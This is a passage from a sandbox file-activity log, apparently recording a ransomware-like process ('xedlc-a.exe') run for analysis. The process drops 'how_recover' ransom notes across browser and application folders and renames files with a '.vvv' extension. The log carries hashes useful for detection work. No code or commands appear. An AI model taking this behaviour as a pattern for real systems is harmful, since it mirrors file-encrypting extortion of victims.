- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons3.txt.vvv
- ads:
- fid (ads:): 562949953478836
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87957
- mode: created
- sequenceNumber: 1514
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\webapps\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778401
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87963
- mode: close
- sequenceNumber: 1515
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\webapps\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778401
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88025
- mode: created
- sequenceNumber: 1516
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\webapps\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778402
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88031
- mode: close
- sequenceNumber: 1517
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\webapps\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778402
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88040
- mode: created
- sequenceNumber: 1518
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778403
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88046
- mode: close
- sequenceNumber: 1519
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778403
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88078
- mode: created
- sequenceNumber: 1520
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778404
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88084
- mode: close
- sequenceNumber: 1521
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778404
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88092
- mode: created
- sequenceNumber: 1522
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778405
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88097
- mode: close
- sequenceNumber: 1523
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778405
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88104
- mode: created
- sequenceNumber: 1524
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778406
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88110
- mode: close
- sequenceNumber: 1525
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778406
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88117
- mode: created
- sequenceNumber: 1526
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778407
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88123
- mode: close
- sequenceNumber: 1527
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778407
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88396
- mode: created
- sequenceNumber: 1528
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778408
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88402
- mode: close
- sequenceNumber: 1529
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778408
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88410
- mode: created
- sequenceNumber: 1530
- value: C:\Documents and Settings\admin\Application Data\Mozilla\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778409
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88416
- mode: close
- sequenceNumber: 1531
- value: C:\Documents and Settings\admin\Application Data\Mozilla\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778409
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88566
- mode: created
- sequenceNumber: 1532
- value: C:\Documents and Settings\admin\Application Data\Mozilla\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778410
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88572
- mode: close
- sequenceNumber: 1533
- value: C:\Documents and Settings\admin\Application Data\Mozilla\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778410
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88580
- mode: created
- sequenceNumber: 1534
- value: C:\Documents and Settings\admin\Application Data\Opera\Opera\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778411
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88586
- mode: close
- sequenceNumber: 1535
- value: C:\Documents and Settings\admin\Application Data\Opera\Opera\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778411
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88593
- mode: created
- sequenceNumber: 1536
- value: C:\Documents and Settings\admin\Application Data\Opera\Opera\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778412
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88599
- mode: close
- sequenceNumber: 1537
- value: C:\Documents and Settings\admin\Application Data\Opera\Opera\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778412
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88605
- mode: created
- sequenceNumber: 1538
- value: C:\Documents and Settings\admin\Application Data\Opera\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778413
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88611
- mode: close
- sequenceNumber: 1539
- value: C:\Documents and Settings\admin\Application Data\Opera\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778413
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88617
- mode: created
- sequenceNumber: 1540
- value: C:\Documents and Settings\admin\Application Data\Opera\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778414
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88623
- mode: close
- sequenceNumber: 1541
- value: C:\Documents and Settings\admin\Application Data\Opera\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778414
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88655
- mode: created
- sequenceNumber: 1542
- value: C:\Documents and Settings\admin\Application Data\Real\RealConverter\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778415
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88661
- mode: close
- sequenceNumber: 1543
- value: C:\Documents and Settings\admin\Application Data\Real\RealConverter\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778415
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88687
- mode: created
- sequenceNumber: 1544
- value: C:\Documents and Settings\admin\Application Data\Real\RealConverter\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778416
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88693
- mode: close
- sequenceNumber: 1545
- value: C:\Documents and Settings\admin\Application Data\Real\RealConverter\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778416
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88819
- mode: created
- sequenceNumber: 1546
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778417
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88825
- mode: close
- sequenceNumber: 1547
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778417
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88831
- mode: created
- sequenceNumber: 1548
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778418
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88837
- mode: close
- sequenceNumber: 1549
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778418
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88871
- mode: open
- sequenceNumber: 1550
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt
- filesize: 80971
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930192785
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89856
- mode: close
- sequenceNumber: 1551
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt
- filesize: 81390
- md5sum: 19899e23528d4c7e7b2f6f9fd0aaa976
- sha1sum: 988322ed02b8877307caad0e946a50185c2eacbd
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930192785
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89865
- mode: rename
- sequenceNumber: 1552
- filesize: 81390
- md5sum: 19899e23528d4c7e7b2f6f9fd0aaa976
- sha1sum: 988322ed02b8877307caad0e946a50185c2eacbd
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt
- new_name: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt.vvv
- ads:
- fid (ads:): 844424930192785
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89903
- mode: created
- sequenceNumber: 1553
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778419
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89909
- mode: close
- sequenceNumber: 1554
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778419
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89916
- mode: created
- sequenceNumber: 1555
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778420
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89921
- mode: close
- sequenceNumber: 1556
- value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778420
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89961
- mode: created
- sequenceNumber: 1557
- value: C:\Documents and Settings\admin\Application Data\Real\rnadmin\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778421
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89966
- mode: close
- sequenceNumber: 1558
- value: C:\Documents and Settings\admin\Application Data\Real\rnadmin\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778421
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89972
- mode: created
- sequenceNumber: 1559
- value: C:\Documents and Settings\admin\Application Data\Real\rnadmin\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778422
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89978
- mode: close
- sequenceNumber: 1560
- value: C:\Documents and Settings\admin\Application Data\Real\rnadmin\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778422
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90048
- mode: created
- sequenceNumber: 1561
- value: C:\Documents and Settings\admin\Application Data\Real\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778423
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90053
- mode: close
- sequenceNumber: 1562
- value: C:\Documents and Settings\admin\Application Data\Real\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778423
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90172
- mode: created
- sequenceNumber: 1563
- value: C:\Documents and Settings\admin\Application Data\Real\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778424
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90178
- mode: close
- sequenceNumber: 1564
- value: C:\Documents and Settings\admin\Application Data\Real\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778424
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90258
- mode: created
- sequenceNumber: 1565
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\AU\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778425
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90263
- mode: close
- sequenceNumber: 1566
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\AU\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778425
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90270
- mode: created
- sequenceNumber: 1567
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\AU\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778426
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90276
- mode: close
- sequenceNumber: 1568
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\AU\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778426
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90286
- mode: created
- sequenceNumber: 1569
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\security\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778427
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90292
- mode: close
- sequenceNumber: 1570
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\security\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778427
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90299
- mode: created
- sequenceNumber: 1571
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\security\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778428
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90305
- mode: close
- sequenceNumber: 1572
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\security\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778428
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90314
- mode: created
- sequenceNumber: 1573
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\si\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778429
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90320
- mode: close
- sequenceNumber: 1574
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\si\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778429
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90326
- mode: created
- sequenceNumber: 1575
